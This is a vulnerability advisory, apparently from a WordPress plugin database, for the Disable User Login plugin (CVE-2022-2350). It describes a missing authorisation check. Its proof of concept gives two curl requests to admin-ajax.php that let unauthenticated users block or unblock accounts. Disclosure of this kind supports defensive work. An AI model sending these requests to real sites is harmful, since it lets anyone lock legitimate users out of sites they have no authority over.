WordPress Plugin Vulnerabilities

Disable User Login <= 1.0.1 - Unauthenticated Settings Update

Description

The plugin does not have authorisation and CSRF checks when updating its settings, allowing unauthenticated attackers to block (or unblock) users at will.

Proof of Concept

Block users registered:
curl -sL http://localhost/wp-admin/admin-ajax.php \
--data "action=dwul_action_callback&useremail={users_registered}"

User activation of block: 
curl -sL http://localhost/wp-admin/admin-ajax.php \
--data "action=dwul_enable_user_email&activateuserid={id}"

Affects Plugins

Plugin icon
wp-users-disable
No known fix

References

CVE
CVE-2022-2350

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Rafshanzani Suhada
Submitter
Rafshanzani Suhada
Verified
Yes
WPVDB ID
de28543b-c110-4a9f-bfe9-febccfba3a96

Timeline

Publicly Published
2022-09-14 (about 1 years ago)
Added
2022-09-14 (about 1 years ago)
Last Updated
2022-09-14 (about 1 years ago)

Other

Published
Title
Published
2022-07-11
Title
YaySMTP < 2.2.1 - Subscriber+ Logs Disclosure
Published
2023-12-27
Title
WooCommerce Canada Post Shipping < 2.8.4 - Unauthenticated Unauthorised Action
Published
2023-12-27
Title
Piotnet Forms < 1.0.30 - Missing Authorization via multiple AJAX actions
Published
2024-04-22
Title
WordPress Backup & Migration < 1.4.9 - Missing Authorization to Directory Traversal
Published
2024-04-29
Title
ACF On-The-Go <= 1.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Content Update